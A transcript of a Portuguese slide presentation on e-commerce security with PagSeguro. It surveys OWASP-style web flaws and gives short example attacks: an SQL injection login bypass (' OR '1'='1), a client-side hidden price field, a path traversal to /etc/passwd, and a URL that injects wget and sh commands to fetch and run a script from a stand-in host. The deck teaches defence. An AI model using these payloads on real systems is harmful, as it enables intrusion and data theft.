e-commerce seguro com pagseguro
Post on 05-Dec-2014
2.748 Views
Preview:
DESCRIPTION
TRANSCRIPT
eCommerce seguro com PagSeguro
medo
OWASPowasp.org
Segurança em todo o processo
Sistema atualizado
Portas fechadas
Senhas seguras
SSL
Falhas na aplicação
SQL Injection
<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>
<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>
login: adminsenha: ' OR '1'='1
<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>
login: adminsenha: ' OR '1'='1
SELECT * FROM user WHERE login='admin' AND senha='' OR '1'='1'
Falsificação de Identidade
Controles no Client
<input type="hidden" name="desconto" value="10,00" />
Quebra de Fluxo
http://seusite.com/compra.php?passo=1
Ataques contra outros clients
HTML Injection
Script Injection
XSS
XSRF
Exposição de recursos
http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php
http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php
http://seusite.com/compra.php?passo=1 &stop=1&template=../../etc/passwd
Execução de recursos
http://seusite.com/relatorio.php?tipo=3&gerador=pdfmaker
http://seusite.com/relatorio.php?tipo=3&gerador=pdfmaker
http://seusite.com/relatorio.php?tipo=3&gerador=wget+pirata.com/script
http://seusite.com/relatorio.php?tipo=3&gerador=sh+script
Autenticação falha
Criptografia insegura
Falha de restrição de acesso
Denial Of Service
Pagamento: processo crítico
PagSeguro
PagSeguro: Uma única implantação
Segurança contra chargeback/fraude
EVSSL + Aplicação segura
Formas de implantação: Carrinho PagSeguro
Carrinho Próprio Retorno Automático
Pontos sensíveis: HTML do Form de Carrinho
URL de Retorno
Proteja sua URL de Retorno: Valide com o Token
Valide os Valores Log
Fique alerta!
Obrigado!
visie.com.brelcio@visie.com.br
top related